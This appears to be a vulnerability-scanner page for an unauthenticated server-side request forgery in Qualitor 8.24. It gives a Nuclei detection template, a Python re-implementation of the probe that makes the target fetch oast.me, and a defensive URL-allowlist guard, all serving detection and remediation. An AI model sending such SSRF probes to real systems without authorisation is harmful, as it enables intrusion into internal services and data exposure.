Qualitor <= v8.24 - Server-Side Request Forgery
ID: CVE-2024-48360
Severity: high
Author: s4e-io
Tags: cve,cve2024,ssrf,qualitor
Description
Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php. The template below reaches it at /html/ad/adformmobile/request/viewValidacao.php and passes an attacker-chosen host in the url query parameter; the server fetches that host itself and returns the fetched content in its response, which is how the check confirms the issue (the CVSS vector, AV:N/AC:L/PR:N, reflects that no authentication is needed).
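An SSRF of this shape exists because a user-supplied value is handed straight to a server-side HTTP client. The guard below is an added example of what such an endpoint should do before fetching anything; it is not Qualitor's code and the page does not show the vulnerable PHP. The allowlisted host name and the fixed_resolver helper are assumptions made so the example runs offline. The guard rejects bare hosts such as oast.me (no scheme), non-http(s) schemes, embedded credentials, hosts outside an allowlist, and any host that resolves to a non-global address (loopback, RFC 1918, link-local including 169.254.169.254, and similar).

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hypothetical allowlist of the only hosts this endpoint legitimately needs to reach.
ALLOWED_HOSTS = {"validation.example.internal"}


def _is_global_ip(ip: str) -> bool:
    """True only for globally routable addresses (no loopback, RFC 1918, link-local, ...)."""
    return ipaddress.ip_address(ip).is_global


def is_safe_target(url: str, resolver=socket.getaddrinfo, allowed_hosts=ALLOWED_HOSTS) -> bool:
    """Decide whether a server-side fetch of `url` is acceptable.

    `resolver` has the signature of socket.getaddrinfo so the check can be run
    offline with a fake; `allowed_hosts=None` disables the allowlist and falls
    back to the address-range check alone (weaker, but still blocks internal targets).
    """
    parts = urlsplit(url)
    # A bare host like "oast.me" has no scheme and is rejected outright.
    if parts.scheme not in ALLOWED_SCHEMES:
        return False
    host = parts.hostname
    if not host or parts.username or parts.password:
        return False
    if allowed_hosts is not None and host.lower() not in allowed_hosts:
        return False
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
        infos = resolver(host, port)
    except (OSError, ValueError):
        return False
    addrs = {info[4][0] for info in infos}
    # Every resolved address must be global; one internal A record is enough to refuse.
    return bool(addrs) and all(_is_global_ip(a) for a in addrs)


def fixed_resolver(*ips):
    """Constructed getaddrinfo stand-in returning the given IPs, for offline demonstration."""
    def _resolve(host, port, *args, **kwargs):
        return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port)) for ip in ips]
    return _resolve


if __name__ == "__main__":
    public = fixed_resolver("93.184.216.34")
    metadata = fixed_resolver("169.254.169.254")
    print(is_safe_target("http://validation.example.internal/check", resolver=public))   # True
    print(is_safe_target("http://validation.example.internal/check", resolver=metadata)) # False
    print(is_safe_target("oast.me", resolver=public))                                     # False
```

One caveat a reviewer would raise: validating the name and then letting the HTTP client resolve it again is a DNS-rebinding window. In production, connect to the address returned by the resolver (pinning it) or run the check inside the client's connection hook rather than before the call.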
YAML Source
id: CVE-2024-48360

info:
  name: Qualitor <= v8.24 - Server-Side Request Forgery
  author: s4e-io
  severity: high
  description: |
    Qualitor v8.24 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /request/viewValidacao.php.
  reference:
    - https://github.com/OpenXP-Research/CVE-2024-48360
    - https://packetstormsecurity.com/files/182427/Qualitor-8.24-Server-Side-Request-Forgery.html
    - https://nvd.nist.gov/vuln/detail/CVE-2024-48360
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-48360
    cwe-id: CWE-918
    epss-score: 0.00043
    epss-percentile: 0.09945
  metadata:
    verified: true
    max-request: 2
    vendor: qualitor
    product: qualitor
    fofa-query: icon_hash="-1217039701"
  tags: cve,cve2024,ssrf,qualitor

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(tolower(body), "qualitor")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /html/ad/adformmobile/request/viewValidacao.php?url=oast.me HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<h1> Interactsh Server </h1>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ff5cfb8a4a836379b4cac49a5facd903b555cbfd64aa7ad5b9c596573f5278db02200fbbffabcc2ca86d0c30a3eb686ffcadfd4c5703c42583b104ac4c233e6aee47:922c64590222798bb761d5b6d8e72950
Guide to check the vulnerabilities
This template detects the vulnerability with the Nuclei scanner in two stages, as declared by flow: http(1) && http(2). The first request fetches / and only passes (internally, without reporting) when the response is HTTP 200 and contains "qualitor" in any letter case, so the second request is not sent to unrelated hosts. The second request asks the vulnerable endpoint to fetch oast.me, ProjectDiscovery's public Interactsh server, and reports a finding when the target returns HTTP 200 with that server's banner, "<h1> Interactsh Server </h1>", in its own response body. Two things follow for anyone running it: the target must be able to reach the public internet, or the check silently fails, and a blind SSRF that does not reflect the fetched content would not be caught by this body match (an {{interactsh-url}} payload with an interactsh matcher would be needed for that).
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-48360.yaml"
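The same two-stage logic, written out as an added Python example that is not part of the template or of Nuclei; it is useful for confirming a hit by hand or for understanding exactly what the matchers require. The paths, the fingerprint word and the banner string are taken from the YAML above; the fake_fetch responder and the constructed responses in it are assumptions made so the logic can be exercised offline.

```python
import sys
import urllib.error
import urllib.request

# Values lifted from the template above.
FINGERPRINT_WORD = "qualitor"
SSRF_PATH = "/html/ad/adformmobile/request/viewValidacao.php"
OAST_HOST = "oast.me"
OAST_BANNER = "<h1> Interactsh Server </h1>"


def http_get(url: str, timeout: float = 10.0):
    """Return (status_code, body_text) for url; all network I/O lives here."""
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2024-48360-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def is_qualitor(status: int, body: str) -> bool:
    """Stage 1 matcher: contains(tolower(body), "qualitor") && status_code == 200."""
    return status == 200 and FINGERPRINT_WORD in body.lower()


def ssrf_confirmed(status: int, body: str) -> bool:
    """Stage 2 matchers (matchers-condition: and): status 200 and the banner in the body."""
    return status == 200 and OAST_BANNER in body


def check_target(base_url: str, fetch=http_get) -> dict:
    """Run both stages against base_url; the second request is only sent after a fingerprint hit.

    Returns {"fingerprint": bool, "vulnerable": bool}. `fetch` is injectable so the
    logic can be tested against constructed responses without touching the network.
    """
    base = base_url.rstrip("/")
    status, body = fetch(base + "/")
    result = {"fingerprint": is_qualitor(status, body), "vulnerable": False}
    if not result["fingerprint"]:
        return result  # flow: http(1) && http(2) stops here, as Nuclei would
    status, body = fetch(base + SSRF_PATH + "?url=" + OAST_HOST)
    result["vulnerable"] = ssrf_confirmed(status, body)
    return result


def fake_fetch(responses: dict):
    """Constructed offline responder: maps a request URL to (status, body); unknown URLs get 404."""
    calls = []

    def _fetch(url, timeout=10.0):
        calls.append(url)
        return responses.get(url, (404, ""))

    _fetch.calls = calls  # records what would have been sent, for inspection
    return _fetch


if __name__ == "__main__":
    # Live use: python3 check.py https://target.example
    print(check_target(sys.argv[1]))
```

Because the banner match needs the target to reach oast.me, a result of fingerprint=True, vulnerable=False from an egress-restricted host is inconclusive rather than a clean negative; repeat the probe with a listener the target can actually reach before closing the finding.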